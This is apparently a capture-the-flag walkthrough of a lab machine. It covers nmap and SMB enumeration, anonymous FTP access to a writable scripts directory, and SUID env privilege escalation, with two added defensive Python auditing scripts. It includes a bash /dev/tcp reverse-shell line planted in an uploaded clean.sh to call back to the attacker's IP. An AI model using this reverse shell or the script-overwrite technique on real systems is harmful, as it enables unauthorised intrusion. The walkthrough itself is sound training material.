Walkthrough
Gaining a Foothold
Nmap
┌──(kali㉿kali)-[~]
└─$ nmap -sC -sV 10.10.70.108
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-13 07:16 EST
Nmap scan report for 10.10.70.108
Host is up (0.28s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxrwxrwx 2 111 113 4096 Jun 04 2020 scripts [NSE: writeable]
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.8.252.53
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 1
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 8b:ca:21:62:1c:2b:23:fa:6b:c6:1f:a8:13:fe:1c:68 (RSA)
| 256 95:89:a4:12:e2:e6:ab:90:5d:45:19:ff:41:5f:74:ce (ECDSA)
|_ 256 e1:2a:96:a4:ea:8f:68:8f:cc:74:b8:f0:28:72:70:cd (ED25519)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: ANONYMOUS; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: -1s, deviation: 0s, median: -2s
| smb2-time:
| date: 2024-01-13T12:26:21
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
| Computer name: anonymous
| NetBIOS computer name: ANONYMOUS\x00
| Domain name: \x00
| FQDN: anonymous
|_ System time: 2024-01-13T12:26:21+00:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_nbstat: NetBIOS name: ANONYMOUS, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 581.59 seconds
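Triage of the scan above, as an added example (not part of the original walkthrough): a small parser for nmap's normal text output that flags the findings that matter here, anonymous FTP with a writable directory and SMB signing/guest settings, and pairs each with the standard vsftpd/Samba directive that closes it. SAMPLE_SCAN is a constructed excerpt of the same scan output.

```python
"""Triage nmap -sC -sV text output for the misconfigurations seen on this box.

Added example, not the walkthrough's code. SAMPLE_SCAN is a constructed excerpt
of the scan above; the remediation hints are standard vsftpd/Samba directives.
"""
import re

# Constructed sample: the relevant lines of the nmap output shown above.
SAMPLE_SCAN = """\
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxrwxrwx 2 111 113 4096 Jun 04 2020 scripts [NSE: writeable]
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required
| smb-security-mode:
|   account_used: guest
|_  message_signing: disabled (dangerous, but default)
"""

PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
SCRIPT_RE = re.compile(r"^\|_?\s*(.*)$")  # NSE output lines start with "|" or "|_"
WRITABLE_RE = re.compile(r"^([d-][rwx-]{9})\s.*?\s(\S+)\s+\[NSE: writeable\]$")


def parse_scan(text):
    """Split nmap normal output into port records and bare NSE script lines."""
    ports, script_lines = [], []
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            ports.append({"port": int(m.group(1)), "proto": m.group(2),
                          "state": m.group(3), "service": m.group(4),
                          "version": m.group(5).strip()})
            continue
        m = SCRIPT_RE.match(line)
        if m:
            script_lines.append(m.group(1).strip())
    return ports, script_lines


def triage(text):
    """Return (severity, finding, fix) tuples for the weaknesses visible in the scan."""
    _, lines = parse_scan(text)
    findings = []
    anon_ftp = any(l.startswith("ftp-anon: Anonymous FTP login allowed") for l in lines)
    if anon_ftp:
        findings.append(("high", "anonymous FTP login allowed (21/tcp)",
                         "vsftpd.conf: anonymous_enable=NO unless a read-only drop is required"))
        for l in lines:
            m = WRITABLE_RE.match(l)
            if m:
                perms, name = m.groups()
                # An anonymous user who can write here can replace any script kept in it.
                findings.append(("critical", f"anonymous FTP user can write to '{name}' ({perms})",
                                 "vsftpd.conf: write_enable=NO, anon_upload_enable=NO; chmod o-w the directory"))
    if "Message signing enabled but not required" in lines:
        findings.append(("medium", "SMB2 message signing enabled but not required",
                         "smb.conf: server signing = mandatory"))
    if any(l.startswith("message_signing: disabled") for l in lines):
        findings.append(("medium", "SMB1 message signing disabled",
                         "smb.conf: server signing = mandatory; server min protocol = SMB2"))
    if "account_used: guest" in lines:
        findings.append(("medium", "SMB guest account accepted",
                         "smb.conf: map to guest = Never; guest ok = no on every share"))
    return findings


if __name__ == "__main__":
    for sev, what, fix in triage(SAMPLE_SCAN):
        print(f"[{sev:8}] {what}\n           fix: {fix}")
```

Feed it the saved `-oN` file of a real scan; the writable-directory line is the one that turns an information-disclosure finding into the code-execution path used later on this box.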
Strings
┌──(kali㉿kali)-[~]
└─$ strings puppos.jpeg
EExif
Three Pembroke Welsh Corgis side by side outdoors. Approved by Denise Flaim September 2018 and Susan Sprung.
Adobe Stock #118102236
Canon
Canon EOS 5D Mark II
Adobe Photoshop CC 2018 (Macintosh)
2019:02:18 12:24:51
Photographer: Tatyana Panova
Tatyana Panova
www.tpanova.ru
FTP
┌──(kali㉿kali)-[~]
└─$ ftp 10.10.70.108
Connected to 10.10.70.108.
220 NamelessOne's FTP Server!
Name (10.10.70.108:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||31967|)
150 Here comes the directory listing.
drwxrwxrwx 2 111 113 4096 Jun 04 2020 scripts
226 Directory send OK.
ftp> cd scripts
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||31977|)
150 Here comes the directory listing.
-rwxr-xrwx 1 1000 1000 314 Jun 04 2020 clean.sh
-rw-rw-r-- 1 1000 1000 1032 Jan 13 12:20 removed_files.log
-rw-r--r-- 1 1000 1000 68 May 12 2020 to_do.txt
226 Directory send OK.
Tip
Transfer in binary mode; ASCII mode can corrupt files.
mget * downloads every file in the current directory.
SMB
┌──(kali㉿kali)-[~]
└─$ smbclient -L \\\\10.10.70.108\\
Password for [WORKGROUP\kali]:
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
pics Disk My SMB Share Directory for Pics
IPC$ IPC IPC Service (anonymous server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP ANONYMOUS
┌──(kali㉿kali)-[~]
└─$ smbclient \\\\10.10.70.108\\pics
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sun May 17 07:11:34 2020
.. D 0 Wed May 13 21:59:10 2020
corgo2.jpg N 42663 Mon May 11 20:43:42 2020
puppos.jpeg N 265188 Mon May 11 20:43:42 2020
corgo2.jpg
puppos.jpeg
Reverse Shell
bash -i >& /dev/tcp/10.8.252.53/7777 0>&1
Edit clean.sh so it contains the line above, then upload it back to the scripts directory.
┌──(kali㉿kali)-[~]
└─$ ftp 10.10.70.108
Connected to 10.10.70.108.
220 NamelessOne's FTP Server!
Name (10.10.70.108:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||62981|)
150 Here comes the directory listing.
drwxrwxrwx 2 111 113 4096 Jun 04 2020 scripts
226 Directory send OK.
ftp> cd scripts
250 Directory successfully changed.
ftp> put clean.sh
local: clean.sh remote: clean.sh
229 Entering Extended Passive Mode (|||61781|)
150 Ok to send data.
100% |***********************************************************************| 55 1.00 MiB/s 00:00 ETA
226 Transfer complete.
55 bytes sent in 00:00 (0.09 KiB/s)
Start a listener on port 7777 and wait for the connection.
Escalating Privileges
TTY Shell
https://wiki.zacheller.dev/pentest/privilege-escalation/spawning-a-tty-shell
SUID
LinEnum.sh lists env among the SUID binaries.
Upgrade to a TTY shell, then follow the GTFOBins SUID entry for env.
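The defender's counterpart to the SUID step, as an added example (not LinEnum.sh and not the walkthrough's code): list SUID files and diff them against what the distribution ships, so a setuid env is caught before anyone needs GTFOBins. EXPECTED_SUID is a representative, not exhaustive, set of stock Ubuntu SUID binaries, HIGH_RISK is a starting set of names whose SUID bit hands out the owner's privileges, and the file tree is a constructed fixture.

```python
"""Baseline check for SUID binaries.

Added example, not the walkthrough's code. EXPECTED_SUID is representative,
HIGH_RISK is a starting list to extend from GTFOBins, build_fixture() is constructed.
"""
import os
import stat
import tempfile

EXPECTED_SUID = {"passwd", "su", "sudo", "mount", "umount", "chsh", "chfn",
                 "gpasswd", "newgrp", "pkexec"}
# SUID on any of these runs arbitrary commands as the file owner.
HIGH_RISK = {"env", "bash", "sh", "dash", "find", "python3", "perl"}


def find_suid(root="/"):
    """Return sorted paths (relative to root, written as /...) of regular files with SUID set."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            try:
                st = os.lstat(full)  # lstat: never follow symlinks
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append("/" + os.path.relpath(full, root))
    return sorted(hits)


def audit_suid(root="/", baseline=EXPECTED_SUID):
    """Classify each SUID file: high if it is a known shell-granting binary,
    medium if it is merely absent from the baseline."""
    findings = []
    for path in find_suid(root):
        name = os.path.basename(path)
        if name in HIGH_RISK:
            findings.append((path, "high", "runs arbitrary commands as its owner; chmod u-s"))
        elif name not in baseline:
            findings.append((path, "medium", "not in baseline; confirm it is expected"))
    return findings


def build_fixture():
    """Constructed tree: stock passwd, the misconfigured env, a stray tool, a normal ls."""
    root = tempfile.mkdtemp(prefix="suid-audit-")
    layout = {"usr/bin/passwd": 0o4755, "usr/bin/env": 0o4755,
              "opt/tool/helper": 0o4755, "usr/bin/ls": 0o755}
    for rel, mode in layout.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w") as fh:
            fh.write("#!/bin/sh\n")  # placeholder content; only the mode matters
        os.chmod(full, mode)
    return root


if __name__ == "__main__":
    for path, sev, why in audit_suid(build_fixture()):
        print(f"[{sev}] {path}: {why}")
```

Run `audit_suid()` with the default root on a real host as root (or as any user, accepting permission errors on unreadable directories), and keep the baseline as a stored list per image so drift shows up as a diff rather than as a judgement call.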